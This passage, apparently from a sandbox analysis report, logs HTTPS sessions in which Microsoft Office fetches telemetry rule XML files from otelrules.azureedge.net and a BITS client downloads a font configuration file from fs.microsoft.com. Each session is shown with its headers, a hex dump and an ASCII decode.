                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      86192.168.2.64981113.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:53 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:53 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 174
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                      ETag: "0x8DC582B91D80E15"
                                                                                                                                                                      x-ms-request-id: 6a968014-801e-0015-537c-3bf97f000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052353Z-178bfbc474btrnf9hC1NYCb80g000000012000000000wra4
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:53 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      87192.168.2.64981013.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:53 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:53 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                      ETag: "0x8DC582BBA642BF4"
                                                                                                                                                                      x-ms-request-id: 26217b89-b01e-001e-808c-3a0214000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052353Z-1777c6cb754wcxkwhC1TEB3c6w0000000ahg00000000cgtd
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:53 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      88192.168.2.64981313.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:55 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:55 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:55 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1952
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                      ETag: "0x8DC582B956B0F3D"
                                                                                                                                                                      x-ms-request-id: 8176cca2-201e-0003-2c64-3bf85a000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052355Z-178bfbc474b9fdhphC1NYCac0n000000010g000000004eem
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:55 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      89192.168.2.64981413.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:55 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:55 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:55 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 958
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                                                                      ETag: "0x8DC582BA0A31B3B"
                                                                                                                                                                      x-ms-request-id: bc14c112-c01e-00ad-2dca-3ba2b9000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052355Z-r1d97b99577gg97qhC1TEBcrf400000009sg0000000070h2
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:55 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      90192.168.2.64981713.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:55 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:55 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:55 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 501
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                                                                      ETag: "0x8DC582BACFDAACD"
                                                                                                                                                                      x-ms-request-id: e6bcc5b6-c01e-0046-7064-3b2db9000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052355Z-178bfbc474bfw4gbhC1NYCunf400000001200000000069sa
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:55 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      91192.168.2.649818184.28.90.27443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:55 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                                      Host: fs.microsoft.com
                                                                                                                                                                      2024-11-21 05:23:55 UTC467INHTTP/1.1 200 OK
                                                                                                                                                                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                      Server: ECAcc (lpl/EF70)
                                                                                                                                                                      X-CID: 11
                                                                                                                                                                      X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                      X-Ms-Region: prod-neu-z1
                                                                                                                                                                      Cache-Control: public, max-age=213696
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:55 GMT
                                                                                                                                                                      Connection: close
                                                                                                                                                                      X-CID: 2


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      92192.168.2.64981913.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:55 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:56 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:56 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 2592
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                      ETag: "0x8DC582BB5B890DB"
                                                                                                                                                                      x-ms-request-id: e7fd51b1-801e-0067-1163-3bfe30000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052356Z-178bfbc474bw8bwphC1NYC38b400000000x0000000005295
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:56 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      93192.168.2.64982013.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:55 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:56 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:56 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 3342
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                                                                      ETag: "0x8DC582B927E47E9"
                                                                                                                                                                      x-ms-request-id: fa7019cc-d01e-0017-4ba1-3bb035000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052356Z-r1d97b99577hc74hhC1TEBvbns00000009p000000000mwtn
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:56 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      94192.168.2.649824184.28.90.27443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:57 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                      If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                      Range: bytes=0-2147483646
                                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                                      Host: fs.microsoft.com
                                                                                                                                                                      2024-11-21 05:23:58 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                      ApiVersion: Distribute 1.1
                                                                                                                                                                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                      Server: ECAcc (lpl/EF06)
                                                                                                                                                                      X-CID: 11
                                                                                                                                                                      X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                      X-Ms-Region: prod-weu-z1
                                                                                                                                                                      Cache-Control: public, max-age=213653
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:57 GMT
                                                                                                                                                                      Content-Length: 55
                                                                                                                                                                      Connection: close
                                                                                                                                                                      X-CID: 2
                                                                                                                                                                      2024-11-21 05:23:58 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                      Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      95192.168.2.64982113.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:57 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:58 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:57 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 2284
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                                                                      ETag: "0x8DC582BCD58BEEE"
                                                                                                                                                                      x-ms-request-id: 1a818a33-b01e-005c-4475-3b4c66000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052357Z-1777c6cb754lvj6mhC1TEBke940000000at00000000038h1
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:23:58 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      96192.168.2.64982213.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:23:57 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:23:58 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:23:58 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1393
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                                                                      ETag: "0x8DC582BE3E55B6E"
                                                                                                                                                                      x-ms-request-id: d2879cce-801e-0047-5869-3b7265000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052358Z-178bfbc474bpnd5vhC1NYC4vr400000000y000000000nw4x
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
